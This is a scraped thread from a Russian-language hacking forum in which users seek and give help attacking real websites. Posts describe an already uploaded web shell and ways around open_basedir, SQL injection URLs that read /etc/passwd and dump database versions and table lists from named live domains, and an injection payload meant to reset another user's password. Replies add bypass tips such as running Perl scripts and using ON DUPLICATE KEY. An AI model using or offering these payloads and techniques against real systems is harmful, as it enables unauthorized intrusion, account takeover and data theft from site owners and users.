Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

03.04.2010, 23:24
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме: 14023893
Репутация:
2163
|
|
Pashkela, ознакомся (второе предложение) https://forum.antichat.ru/showpost.php?p=1796647&postcount=20
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 03.04.2010 в 23:33..
|
|
|

04.04.2010, 00:03
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Есть залитый шелл, но выбраться выше public_html нельзя из-за open_basedir. Но ls, cat и другие консольные команды работают и позволяют выбраться в public_html любого домена, висящего на этом хосте. В случае если доменов мало, можно просто слить еще один шелл в другой домен и разбираться уже через него, но когда доменов много... Поэтому:
1. Есть ли способы обойти open_basedir? (PHP 5.1.2)
2. Возможно бред, но есть ли веб-шелл, работающий практически полностью на одних консольных командах?
|
|
|

04.04.2010, 00:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме: 6075534
Репутация:
2731
|
|
open_basedir не действует на PERL. Попробуй это.
|
|
|

04.04.2010, 12:48
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от Nek1t
В cgi-bin прав на запись нет, заливаю test.pl в произвольную папку, предварительно создав .htaccess c таким содержанием:
Получаю:
Perl точно установлен, т.к. через perl script.pl все работает.
Набираю в Opera:
http://www.ettisalqatar.com/cgi-script/test.pl
http://www.ettisalqatar.com/cgi-bin/test.pl
http://www.ettisalqatar.com/cgi-script/script.pl
http://www.ettisalqatar.com/cgi-bin/script.pl
Не могу найти shell.
И, подскажите статью по заливке Perl Shell.
Заранее всем спасибо.
|
|
|

04.04.2010, 13:02
|
|
Новичок
Регистрация: 09.03.2010
Сообщений: 17
Провел на форуме: 34021
Репутация:
0
|
|
Есть сайт, он подвержен SQL инъекции, знаю потому что получил лог и пас от админки, но толку с этого мало, так как встроеный в админку загрузчик переименовывает любой фаил по шаблону целиком в .gif Сервер же со своей стороны не дает возможности исполнять gif. Так же хостер (или админ) не дурак и прав у юзера SQL базы недостаточно на чтние /etc/password, выдает пустой экран, в смысле сюль рагирует позитивно но ничего не сгружает (проверял фаер багом на предмет скрытого теста, но пусто). Отсюда резонный вопрос, что посоветуете делать и как извернутся?
чуть не забыл на сервере включенный магические кавычки, но CHAR не лечит, как впрочем 16чная система, прав нет. залить, через sql то же не получилось, возможно что то не так делаю, собственно сам линк инъекции в студии
Код:
http://www.site.ru/news.php?id=-99999999+union+select+load_file(0x2f6574632f706173737764),2,3 /*
(попытка чтения етц)
Если резюмировать, то вопросов 2а, как надуть загрузчик фаилов или как правильно залить шел через SQL (MySQL)
Нe и конечно юзер скуль не роот(понятно почему он не читает /etc/passwd), ротового как найти незнаю, у хостера ниче так сайт я дырок ненашел... (mtw.ru)
Последний раз редактировалось ZeroCold; 04.04.2010 в 13:16..
|
|
|

04.04.2010, 14:15
|
|
Познающий
Регистрация: 30.03.2008
Сообщений: 64
Провел на форуме: 388255
Репутация:
15
|
|
Есть такой код:
PHP код:
$nomer=$_POST["nomer"];
mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')");
К переменной присваиваю значение:
PHP код:
<option value="2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*
">двойка</option>
Получается такой запрос:
PHP код:
mysql_query("insert into tb_ref (user,nomer) values ('$user','2') UNION UPDATE tb_users SET password=123 WHERE username=GivioN"); /*')");
но он не работает и ошибки нет никакой
Какие данные отправлять в переменной $nomer что бы установить пароль 123 для username=GivioN ?
Магик. квотес в положении off!
Последний раз редактировалось GivioN; 04.04.2010 в 14:18..
|
|
|

04.04.2010, 14:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
ZeroCold
Если mc=on, то шелл через скуль не залить(кроме отдельных часных случаев), запрос на вывод passwd у тебя правильный, если столбец принтабельный, а ничего не выводится, значит скорее всего нет прав
По поводу загрузки файлов. Вариантов очень много, всё зависит от кода, но может получится и так, что обойти его не получится совсем
GivioN
Попробуй почитать что-то. Например про оператор union
http://phpclub.ru/mysql/doc/union.html
|
|
|

04.04.2010, 14:39
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от Ershik
Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,concat_ws( 0x3a,version(),database(),user(),@@version_compile _os),4+--+
5.0.51a-24+lenny2:mihadmin_main:mihadmin_main@localhost:de bian-linux-gnu
http://mihadmin.ru/statpage.php?sid=love'+union+select+1,2,group_conc at(0x0b,table_name),4+from+information_schema.tabl es+--+
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
PROFILING,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
article,
const,
group,
group_refer,
menu,
news,
rights,
rights_refer,
statpage,
user
|
|
|

04.04.2010, 14:55
|
|
Познающий
Регистрация: 30.03.2008
Сообщений: 64
Провел на форуме: 388255
Репутация:
15
|
|
Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.
и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
$nomer=$_POST["nomer"];
mysql_query("insert into tb_ref (user,nomer) values ('$user','$nomer')");
|
|
|

04.04.2010, 15:14
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от GivioN
Jokester, понятно. Вот только не могу найти как объединить 2 команды insert и UPDATE в одном запросе.
и вобще, возможно как нибуть обновить даные в БД с таким уязвимым кодом:
https://forum.antichat.ru/showthread.php?t=56221
ON DUPLICATE KEY
При прокачанной удаче хакера может сработать, хотя конечно...
А вообще, иньекции в инсерте крутятся, либо через вывод ошибок, либо more1row, так-что расскручивай как обычно
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|